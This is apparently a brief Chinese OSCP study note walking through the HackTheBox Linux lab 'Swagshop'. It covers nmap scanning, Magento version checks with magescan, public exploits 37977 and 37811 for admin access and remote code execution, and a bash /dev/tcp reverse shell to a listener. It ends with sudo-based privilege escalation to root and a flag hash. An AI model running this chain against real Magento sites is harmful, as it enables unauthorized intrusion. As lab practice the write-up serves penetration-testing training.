OSCP备考_0x14_HackThBox靶机_Linux_Swagshop
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.180.205 (扫描TCP)
nmap -sU --top-ports 100 10.129.180.205 (扫描UDP)
访问80端口直接跳转swagshop.htb 绑定HOST
https://github.com/steverobbins/magescan/releases 查看版本
php magescan.phar scan:all http://swagshop.htb
然后查看有没有漏洞
使用37977.py,需要加index.php
有了账号密码可以执行另外一个RCE 37811
直接反弹SHELL,
python2 37811.py 'http://swagshop.htb/index.php/admin' "bash -c 'bash -i >& /dev/tcp/10.10.16.31/3334 0>&1'"
sudo -l
写入
!/bin/bash
直接跳转root权限
5c0dddff61853908d0441b804ec0a383